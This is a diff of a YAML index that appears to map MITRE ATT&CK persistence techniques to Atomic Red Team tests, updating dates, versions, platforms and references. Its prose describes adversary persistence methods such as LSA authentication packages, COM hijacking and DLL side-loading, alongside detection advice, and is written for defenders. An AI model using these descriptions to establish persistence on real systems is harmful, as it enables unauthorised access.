+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests:
     - name: Add command to .bash_profile
@@ -40567,7 +40976,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -40590,12 +40999,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -40673,41 +41081,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -40716,27 +41094,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -40797,7 +41202,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -40841,7 +41245,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -40863,7 +41267,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -40944,7 +41347,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -40967,7 +41369,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -40997,12 +41399,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -41092,12 +41492,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -41182,7 +41581,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -41247,18 +41645,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -41291,10 +41688,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -41331,7 +41727,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -41405,7 +41800,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -41433,12 +41828,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -41497,33 +41891,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -41544,6 +41915,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -41558,52 +41930,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -41625,6 +41987,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -41635,23 +41998,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -41668,7 +42058,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -41727,7 +42117,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -41809,7 +42198,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests:
     - name: rc.common
@@ -41966,7 +42354,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests:
     - name: Create Systemd Service
@@ -42125,7 +42512,7 @@ persistence:
           systemctl daemon-reload
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -42148,16 +42535,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -42184,7 +42570,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -42253,7 +42638,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -42289,7 +42673,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -42308,12 +42692,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -42363,12 +42746,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -42401,9 +42783,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -42420,9 +42803,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -42468,12 +42850,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
